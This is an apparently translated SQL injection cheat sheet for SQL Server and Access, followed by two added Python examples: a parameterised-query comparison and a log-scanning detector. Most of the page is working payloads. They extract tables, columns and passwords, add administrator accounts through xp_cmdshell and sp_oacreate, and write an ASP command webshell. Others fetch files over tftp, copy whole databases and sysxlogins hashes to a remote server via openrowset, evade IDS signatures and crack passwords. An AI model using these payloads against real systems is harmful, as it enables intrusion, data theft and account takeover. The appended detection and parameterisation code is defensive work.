Author: Years Union
Pig's SQL injection summary (from the early 'or'1'='1 onwards)

The most important system tables (e.g. select * from sysobjects): sysobjects, ncsysobjects, sysindexes, tsysindexes, syscolumns, systypes, sysusers, sysdatabases, sysxlogins, sysprocesses.

The most important user names (present by default in a SQL Server database): public, dbo, guest (generally disabled, or without privileges), db_securityadmin, db_ddladmin.

Some default extended stored procedures:
xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread, xp_regremovemultistring, xp_regwrite (registry access)
xp_availablemedia (drives)
xp_dirtree (directory tree)
xp_enumdsn (ODBC connections)
xp_loginconfig (server security mode information)
xp_makecab (create a compressed archive)
xp_ntsec_enumdomains (domain information)
xp_terminate_process (terminate a process, given its PID)

Examples:
sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar
' group by users.id having 1=1--
' group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values (666, 'attacker', 'foobar', 0xfff)--
' union select TOP 1 column_name from information_schema.columns where table_name='logintable'--
' union select TOP 1 column_name from information_schema.columns where table_name='logintable' where column_name not in ('login_id')--
' union select TOP 1 column_name from information_schema.columns where table_name='logintable' where column_name not in ('login_id', 'login_name')--
' union select TOP 1 login_name from logintable--
' union select TOP 1 password from logintable where login_name='Rahul'--

Constructed statements (version, current login, whether xp_cmdshell exists):
' union select @@version, 1, 1, 1--
and 1=(select @@version)
and 'sa'=(select system_user)
' union select ret, 1, 1, 1 from foo--
' union select min(username), 1, 1, 1 from users where username > 'a'--
' union select min(username), 1, 1, 1 from users where username > 'admin'--
' union select password, 1, 1, 1 from users where user_name()='dbo'
and 0<>(select user_name())--
declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:/winnt/system32/cmd.exe /c net user swap 5245886 /add'
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell') -- query whether xp_cmdshell exists
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
1=(%20select%20count(*)%20FROM%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select is_srvrolemember('sysadmin')) -- judge whether the login has sa (sysadmin) authority
and 0<>(select top 1 paths from newtable)--

The "branch" method:
and 1=(select name from master.dbo.sysdatabases where dbid=7) -- get a database name (dbid 1 to 5 are the system databases; 6 and above can be enumerated)

Create a virtual directory for drive E:
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -w "Default Web Site" -v "E","E:/"'

Access properties (to write a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a w3svc/1/root/e browse'

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9 ... to get more database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u') -- get a table name; assume it is admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('admin')) -- get the next table name
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id))) -- judge the id value; assume it is 18779569 (uid=id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) -- get a field of admin; assume it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id', ...)) -- get the other fields
and 0<(select user_id from bbs.dbo.admin where username>1) -- the password can be obtained in the same way.
Assuming fields such as user_id, username and password exist:
show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(The union statement is popular. Access also has special tricks of its own with the branch method: %5c = '\', or swap / and \, and modify %5c.)

Submit:
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u') -- get a table name
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id))) -- judge the id value
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794) -- all fields
http://xx.xx.xx.xx/111.asp?id=3400; create table [dbo].[swap] ([swappass] [char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1;
create table newtable (id int identity(1,1), paths varchar(500))
declare @test varchar(20) exec master..xp_regread @rootkey='hkey_local_machine', @key='system/currentcontrolset/services/w3svc/parameters/virtual roots/', @value_name='/', @value=@test output insert into paths (path) values (@test)
http://61.131.96.39/pageshow.asp?tianName=Policy and Regulations&Infoid={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",null,"cmd.exe%20/c%20ping%201.1.1.1";--
Get the web path (D:/xxxx), then:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400; create table cmd (str image);--

Traditional xp_cmdshell test procedure:
; exec master.dbo.sp_addlogin hax;--
; exec master.dbo.sp_password null, hax, hax;--
; exec master.dbo.sp_addsrvrolemember hax, sysadmin;--
; exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http://www.xxx.com/list.asp?classid=1; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:/winnt/system32/cmd.exe /c net user swap 5258 /add';
declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:/winnt/system32/cmd.exe /c net localgroup administrators swap /add'
http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i yourip get file.exe'--
declare @a sysname set @a='xp_''cmdshell' exec @a 'dir c:/'
declare @a sysname set @a='xp''_cm''dshell' exec @a 'dir c:/'
; declare @a sysname; set @a=db_name(); backup database @a to disk='[your IP][your shared directory]bak.dat' -- usable when the above is restricted.
select * from openrowset('sqloledb', 'server';'sa';'', 'select ''''exec master.dbo.sp_addlogin hax')

Traditional query construction: select * from news where id=... and topic=... and ...
admin' and (*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass<>'
select 123;--
; use master;--
: a' or name like 'fff%';-- shows a user named fff.
'and 1<>(user]);--
; update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='fff';--
Description: the statement above gets the first user table in the database and puts its name into the email field of user fff.
By viewing user fff's information you get the first table, called ad. Using the table name ad, get the id of this table:
fff'; update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='fff';--
Then the name of the next table can be obtained:
fff'; update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='fff';--
fff'; update [users] set email=(select top 1 count(id) from password) where name='fff';--
fff'; update [users] set email=(select top 1 pwd from password where id=2) where name='fff';--
fff'; update [users] set email=(select top 1 name from password where id=2) where name='fff';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll' -- an extended stored procedure can then be called like an ordinary stored procedure: exec xp_webserver. Once it has been executed it can be removed: sp_dropextendedproc 'xp_webserver'
insert into users values (666, char(0x63) char(0x68) char(0x72) char(0x69) char(0x73), char(0x63) char(0x68) char(0x72) char(0x69) char(0x73), 0xfff)--
insert into users values (667, 123, 123, 0xfff)--
insert into users values (123, 'admin''--', 'password', 0xffff)--
; and user>0
; and (select count(*) from sysobjects)>0
; and (select count(*) from msysobjects)>0 // for Access databases

Some common injection cases:
(a) id=49: the injected parameter is numeric, and the SQL statement is roughly: select * from tablename where field=49
The injected parameter is id=49 and [query condition], i.e. the generated statement is: select * from tablename where field=49 and [query condition]
(b) class=series: the injected parameter is a string, and the SQL statement is roughly: select * from tablename where field='series'. The injected parameter is class=series' and [query condition] and ''=', i.e. the generated statement is: select * from tablename where field='series' and [query condition] and ''=''
(c) Unfiltered search parameters, e.g. keyword=keyword: the SQL statement is roughly: select * from tablename where field like '%keyword%'. The injected parameter is keyword=' and [query condition] and '%25'=', i.e. the generated statement is: select * from tablename where field like '%' and [query condition] and '%'='%'

; and (select top 1 name from sysobjects where xtype='u' and status>0)>0
sysobjects is the SQL Server system table that stores all table names, views, constraints and other objects; xtype='u' and status>0 selects the tables created by users. The statement above takes the first table name and compares it with 0, so the error message exposes the table name.
; and (select top 1 col_name(object_id('tablename'), 1))>0
After the table name has been obtained, object_id('tablename') returns the table's internal id, and col_name(tableid, 1) returns the first field name of that table; replace 1 with 2, 3, 4 ... to get the field names of the given table one by one.
post.htm content: mainly to make input convenient.
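The three query shapes just described, built first by string concatenation (the vulnerable form the page assumes) and then with bound parameters, as an added Python/sqlite example that is not part of the original page; the news table and its rows are constructed here, and the probe values are the page's own "and [query condition]" forms:

```python
import sqlite3

# Constructed sample data (not from the page): a small table standing in for the
# news/admin tables behind the page's show.asp and list.asp style endpoints.
ROWS = [
    (49, "series", "sql injection summary"),
    (50, "series", "openrowset notes"),
    (51, "other", "hash cracking"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table news (id integer, class text, title text)")
    db.executemany("insert into news values (?, ?, ?)", ROWS)
    return db


def vulnerable(db, kind, value):
    """The page's three query shapes built by concatenation:
    (a) numeric id=49, (b) quoted string class='series', (c) like '%keyword%'."""
    if kind == "numeric":
        sql = "select * from news where id = " + value
    elif kind == "string":
        sql = "select * from news where class = '" + value + "'"
    else:
        sql = "select * from news where title like '%" + value + "%'"
    return db.execute(sql).fetchall()


def safe(db, kind, value):
    """Same queries with bound parameters: the value is data, never SQL text."""
    if kind == "numeric":
        # Type-check first; anything that is not an integer raises ValueError.
        return db.execute("select * from news where id = ?", (int(value),)).fetchall()
    if kind == "string":
        return db.execute("select * from news where class = ?", (value,)).fetchall()
    # Wildcards are added inside the SQL, so '%' or quotes in the value stay literal.
    return db.execute("select * from news where title like '%' || ? || '%'",
                      (value,)).fetchall()


def compare(kind, value):
    """Return (rows from the concatenated query, rows from the parameterised query);
    -1 means the parameterised path rejected the input before any query ran."""
    db = make_db()
    vuln_rows = len(vulnerable(db, kind, value))
    try:
        safe_rows = len(safe(db, kind, value))
    except ValueError:
        safe_rows = -1
    return vuln_rows, safe_rows


if __name__ == "__main__":
    # A true condition keeps the rows and a false one removes them: that difference
    # is exactly the signal the page's "and [query condition]" probes rely on.
    for kind, value in [("numeric", "49 and 1=1"), ("numeric", "49 and 1=2"),
                        ("string", "series' and 1=1 and ''='"),
                        ("like", "' and 1=1 and '%'='")]:
        print(kind, repr(value), compare(kind, value))
```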
Read the first table; the second table can be read by adding the table name just obtained to the condition:
id=1552; update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
then id=1552 and exists(select * from aaa where aaa>5) -- reads the second table
Reading fields works like this:
id=1552; update aaa set aaa=(select top 1 col_name(object_id('tablename'), 1));--
then id=1552 and exists(select * from aaa where aaa>5) -- the error reveals the field name
id=1552; update aaa set aaa=(select top 1 col_name(object_id('tablename'), 2));--
then id=1552 and exists(select * from aaa where aaa>5) -- the error reveals the next field name

Advanced tips:
[Get table names] Update a field's value to a table name, then read that field to get the table name:
update tablename set field=(select top 1 name from sysobjects where xtype='u' and status>0 [and name<>'name already obtained', added one by one]) [where condition]
select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('table1', 'table2', ...)
Involves the database administrator account and the system administrator account [the current account must be in the sysadmin group].
[Get the field names of a table] Update a field's value to a field name, then read that field to get the field name:
update tablename set field=(select top 1 col_name(object_id('table to query'), field position, e.g. 1)) [where condition]
Bypassing IDS detection [use variables]:
declare @a sysname set @a='xp_''cmdshell' exec @a 'dir c:/'
declare @a sysname set @a='xp''_cm''dshell' exec @a 'dir c:/'

1. Opening a remote database
Basic syntax: select * from openrowset('sqloledb', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1')
Parameters: (1) the OLEDB provider name; (2) the connection string, whose parameters can be any address and port to be used, e.g.:
select * from openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from table')
To copy the entire database of the target host, first set up a connection between the target host and the database on your own machine (how to establish a remote connection from the target host has already been covered), then INSERT all the data into the local table.
Basic syntax: insert into openrowset('sqloledb', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1') select * from table2
This statement copies all the data in table2 on the target host into table1 in the remote database. In actual use the IP address and port in the connection string are modified to point where you need, e.g.:
insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from table1') select * from table2
insert into openrowset('sqloledb', 'uid=sa;pwd=hack3r;network=dbmssocn;address=202.100.100.1,1433;', 'select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into openrowset('sqloledb', 'uid=sa;pwd=hack3r;network=dbmssocn;address=202.100.100.1,1433;', 'select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from _syscolumns') select * from user_database.dbo.syscolumns
After this you can see the structure of the target host's database from your local database, which is otherwise easy to get confused about; without further ado, copy the database:
insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from table1') select * from database..table1
insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from table2') select * from database..table2
...
3. Copying, as above.
4. Hash table (HASH): this is actually an extension of the database copying above. The login passwords are stored in sysxlogins.
As follows: insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins
After obtaining the hashes, 6. brute-force cracking can be attempted. This requires a little luck and a lot of time.
Ways to traverse directories. Create a temporary table:
5'; create table temp (id nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
5'; insert temp exec master.dbo.xp_availablemedia;-- get all current drives
5'; insert into temp (id) exec master.dbo.xp_subdirs 'c:/';-- get the list of subdirectories
5'; insert into temp (id, num1) exec master.dbo.xp_dirtree 'c:/';-- get all subdirectories of the directory tree and store them in the temp table
5'; insert into temp (id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- view file contents
5'; insert into temp (id) exec master.dbo.xp_cmdshell 'dir c:/';--
5'; insert into temp (id) exec master.dbo.xp_cmdshell 'dir c:/*.asp /s /a';--
5'; insert into temp (id) exec master.dbo.xp_cmdshell 'cscript c:/inetpub/adminscripts/adsutil.vbs enum w3svc'
5'; insert into temp (id, num1) exec master.dbo.xp_dirtree 'c:/';-- (xp_dirtree is executable by public)

Write to the table:
Statement 1: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('sysadmin'));--
Statement 2: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('serveradmin'));--
Statement 3: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('setupadmin'));--
Statement 4: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('securityadmin'));--
Statement 5: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('securityadmin'));--
Statement 6: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('diskadmin'));--
Statement 7: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('bulkadmin'));--
Statement 8: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('bulkadmin'));--
Statement 9: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_member('db_owner'));--

Write the path to the table:
http://www.xxxxx.com/down/list.asp?id=1; create table dirs (paths varchar(100), id int)--
http://www.xxxxx.com/down/list.asp?id=1; insert dirs exec master.dbo.xp_dirtree 'c:/'--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('inetpub'))--
Statement: http://www.xxxxx.com/down/list.asp?id=1; create table dirs1 (paths varchar(100), id int)--
Statement: http://www.xxxxx.com/down/list.asp?id=1; insert dirs exec master.dbo.xp_dirtree 'e:/web'--
Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)--

Back up the database to the web directory and download it:
http://www.xxxxx.com/down/list.asp?id=1; declare @a sysname; set @a=db_name(); backup database @a to disk='e:/web/down.bak';--
and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20t%20order%20by%20id%20desc)
and%201=(select%20top%201%20col_name(object_id('user_login'),1)%20from%20sysobjects)
See the related tables.
and 1=(select%20user_id%20from%20user_login)
and%200=(select%20user%20from%20user_login%20where%20user>1)
...

-- wscript.shell example
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', null, 'notepad.exe'
It could be run in our sample scenario by specifying the following username:
'; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'notepad.exe'--

2) This example uses the 'scripting.filesystemobject' object to read a known text file:
-- scripting.filesystemobject example - read a known file
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:/boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while (@ret = 0)
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

3) This example creates an ASP script that will run any command passed to it in the querystring:
-- scripting.filesystemobject example - create a 'run this' .asp file
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:/inetpub/wwwroot/foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', null, '<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd")) %>'
It is important to note that when running on a Windows NT4 / IIS4 platform, commands issued by this ASP script will run as the 'system' account. In IIS5, however, they will run as the low-privileged IWAM_xxx account.

4) This (somewhat spurious) example illustrates the flexibility of the technique; it uses the 'speech.voicetext' object, causing the SQL Server to speak:
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', null, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', null, 'all your sequel servers are belong to us', 528
waitfor delay '00:00:05'
This could of course be run in our example scenario by specifying the following username (note that the example is not only injecting a script but simultaneously logging in to the application as admin):
Username: admin'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', null, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', null, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--

Common passwords and the related statement:
Passwords: sqlserver, sql, admin, sesame, sa, guest
Here is the script (sqlcrack.sql):
create table tempdb..passwords (pwd varchar(255))
bulk insert tempdb..passwords from 'c:/temp/passwords.txt'
select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare(pwd, sysxlogins.password, 0) =
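An added detection example, not part of the original page, that URL-decodes and normalises web-request log lines and flags the payload families catalogued above: extended procedures, sp_oa* automation, openrowset, is_srvrolemember probes, system-table reads, union select, backup database, exec of a variable (the page's IDS-bypass trick), char() obfuscation and 'or'1'='1 tautologies. The log lines are constructed and the signature names are my own; the split-string xp_ trick is included to show that a naive xp_ signature misses it while the exec-of-a-variable one does not.

```python
import re
from urllib.parse import unquote, unquote_plus

# Signatures for the SQL Server techniques catalogued on this page, matched
# against a URL-decoded, lower-cased, whitespace-collapsed request line.
PATTERNS = [
    ("extended_proc", r"\bxp_[a-z]+"),                  # xp_cmdshell, xp_dirtree, xp_reg*
    ("ole_automation", r"\bsp_oa[a-z]+"),               # sp_oacreate / sp_oamethod
    ("distributed_query", r"\bopenrowset\b"),
    ("role_probe", r"\bis_(?:srvrole)?member\s*\("),    # is_srvrolemember('sysadmin') ...
    ("system_table", r"\b(?:sysobjects|syscolumns|sysxlogins|sysdatabases|information_schema)\b"),
    ("union_select", r"\bunion\s+(?:all\s+)?select\b"),
    ("backup_to_disk", r"\bbackup\s+database\b"),
    ("exec_variable", r"\bexec(?:ute)?\s+@[a-z_]+"),    # exec @a after set @a='xp_'...
    ("char_obfuscation", r"\bchar\s*\(\s*(?:0x[0-9a-f]+|\d+)\s*\)"),  # xtype=char(85)
    ("tautology", r"'\s*(?:or|and)\s*'[^']*'\s*=\s*'"),  # 'or'1'='1
]
COMPILED = [(name, re.compile(rx)) for name, rx in PATTERNS]


def normalize(line: str) -> str:
    """Undo the encodings a request can carry: %xx (twice, so %25xx double
    encoding is also seen), '+' as space, letter case and runs of whitespace."""
    decoded = unquote(unquote_plus(line))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(line: str) -> list:
    """Return the sorted signature names that fire on one log line."""
    text = normalize(line)
    return sorted(name for name, rx in COMPILED if rx.search(text))


def scan(lines) -> list:
    """Return (line_index, tags) for every line that triggers a signature."""
    hits = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits.append((i, tags))
    return hits


# Constructed IIS-style log lines (not from the page) covering its payload families;
# the last two are benign controls ("trade union" contains no "union select").
SAMPLE_LOG = [
    "2004-03-12 10:15:01 GET /down/list.asp id=1%20and%201=(select%20is_srvrolemember('sysadmin'));-- 200",
    "2004-03-12 10:15:07 GET /111.asp id=3400;declare%20@s%20int;exec%20sp_oacreate%20%22wscript.shell%22,@s%20out;exec%20sp_oamethod%20@s,%22run%22,null,%22cmd.exe%22;-- 500",
    "2004-03-12 10:15:12 GET /show.asp id=-1%20union%20select%201,2,3,*%20from%20admin 200",
    "2004-03-12 10:15:20 GET /list.asp id=1%20and%201=(select%20top%201%20name%20from%20sysobjects%20where%20xtype=char(85)) 500",
    "2004-03-12 10:15:33 GET /list.asp id=1;declare%20@a%20sysname%20set%20@a='xp_'%2B'cmdshell'%20exec%20@a%20'dir' 500",
    "2004-03-12 10:16:30 POST /login.asp username=admin'or'1'='1 200",
    "2004-03-12 10:16:01 GET /list.asp id=12 200",
    "2004-03-12 10:16:05 GET /search.asp keyword=trade%20union 200",
]
```

Running scan(SAMPLE_LOG) flags the first six lines only; feeding it real W3C logs means passing the cs-uri-query field (or the whole line) exactly as logged, before any decoding.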